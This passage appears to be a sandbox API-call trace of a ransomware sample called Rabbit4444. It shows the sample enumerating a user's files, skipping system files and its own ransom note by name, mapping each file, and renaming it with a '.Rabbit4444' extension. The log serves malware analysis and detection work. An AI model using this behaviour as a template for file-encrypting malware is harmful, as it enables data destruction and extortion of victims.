lpString1="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms") returned="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms" [0059.572] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.572] lstrlenW (lpString="Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms") returned 64 [0059.572] lstrlenW (lpString="Rabbit4444") returned 10 [0059.573] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.573] lstrlenW (lpString=".dll") returned 4 [0059.573] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.573] lstrlenW (lpString=".lnk") returned 4 [0059.573] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.573] lstrlenW (lpString=".ini") returned 4 [0059.573] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.573] lstrlenW (lpString=".sys") returned 4 [0059.573] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.573] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ddf23ef5-6677-42c1-92cb-29bdcb7375b8}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.573] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.573] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15088385417) returned 1 [0059.573] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1071) returned 1 [0059.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.573] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.574] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.576] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15088637518) returned 1 [0059.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.576] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.576] CloseHandle (hObject=0x298) returned 1 [0059.576] CloseHandle (hObject=0x278) returned 1 [0059.576] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms.Rabbit4444") returned 192 [0059.576] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ddf23ef5-6677-42c1-92cb-29bdcb7375b8}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DDF23EF5-6677-42C1-92CB-29BDCB7375B8}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ddf23ef5-6677-42c1-92cb-29bdcb7375b8}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.577] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569d6fa0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x569d6fa0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", cAlternateFileName="CL499E~1.SET")) returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2=".") returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="..") returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="windows") returned -1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="boot") returned 1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.577] lstrcmpiW (lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.577] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms" | out: lpString1="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms") returned="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms" [0059.577] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.577] lstrlenW (lpString="Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms") returned 64 [0059.577] lstrlenW (lpString="Rabbit4444") returned 10 [0059.577] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.577] lstrlenW (lpString=".dll") returned 4 [0059.577] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.578] lstrlenW (lpString=".lnk") returned 4 [0059.578] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.578] lstrlenW (lpString=".ini") returned 4 [0059.578] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.578] lstrlenW (lpString=".sys") returned 4 [0059.578] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{df7b19ef-dea5-47d7-bba5-9fcbe400a59d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.578] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.578] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15088880280) returned 1 [0059.578] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1249) returned 1 [0059.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.578] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0059.579] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0059.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.580] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.581] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15089161890) returned 1 [0059.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.581] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.581] CloseHandle (hObject=0x298) returned 1 [0059.581] CloseHandle (hObject=0x278) returned 1 [0059.581] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms.Rabbit4444") returned 192 [0059.581] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{df7b19ef-dea5-47d7-bba5-9fcbe400a59d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{DF7B19EF-DEA5-47D7-BBA5-9FCBE400A59D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{df7b19ef-dea5-47d7-bba5-9fcbe400a59d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.582] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a6f90b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56a6f90b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23137ab2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", cAlternateFileName="CL8C1E~1.SET")) returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2=".") returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="..") returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="windows") returned -1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="boot") returned 1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.582] lstrcmpiW (lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.582] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms" | out: lpString1="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms") returned="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms" [0059.582] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.583] lstrlenW (lpString="Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms") returned 64 [0059.583] lstrlenW (lpString="Rabbit4444") returned 10 [0059.583] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.583] lstrlenW (lpString=".dll") returned 4 [0059.583] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.583] lstrlenW (lpString=".lnk") returned 4 [0059.583] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.583] lstrlenW (lpString=".ini") returned 4 [0059.583] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.583] lstrlenW (lpString=".sys") returned 4 [0059.583] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.583] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e00117f3-53ba-4e06-b9bf-b8e22a1469e6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.583] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.583] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15089402689) returned 1 [0059.583] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=887) returned 1 [0059.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.583] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x680, lpName=0x0) returned 0x298 [0059.585] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x680) returned 0x70000 [0059.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.585] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.586] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.586] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15089666769) returned 1 [0059.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.586] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.586] CloseHandle (hObject=0x298) returned 1 [0059.586] CloseHandle (hObject=0x278) returned 1 [0059.586] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms.Rabbit4444") returned 192 [0059.586] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e00117f3-53ba-4e06-b9bf-b8e22a1469e6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E00117F3-53BA-4E06-B9BF-B8E22A1469E6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e00117f3-53ba-4e06-b9bf-b8e22a1469e6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.587] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56b0826d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56b0826d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", cAlternateFileName="CLF0E4~1.SET")) returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2=".") returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="..") returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="windows") returned -1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="boot") returned 1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.587] lstrcmpiW (lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.587] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms" | out: lpString1="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms") returned="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms" [0059.587] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.588] lstrlenW (lpString="Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms") returned 64 [0059.588] lstrlenW (lpString="Rabbit4444") returned 10 [0059.588] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.588] lstrlenW (lpString=".dll") returned 4 [0059.588] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.588] lstrlenW (lpString=".lnk") returned 4 [0059.588] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.588] lstrlenW (lpString=".ini") returned 4 [0059.588] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.588] lstrlenW (lpString=".sys") returned 4 [0059.588] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{E07F215A-6022-40E0-A109-17078992E5F9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{e07f215a-6022-40e0-a109-17078992e5f9}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.588] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.588] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15089913568) returned 1 [0059.588] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1060) returned 1 [0059.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.589] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.589] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.590] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.591] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.591] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: 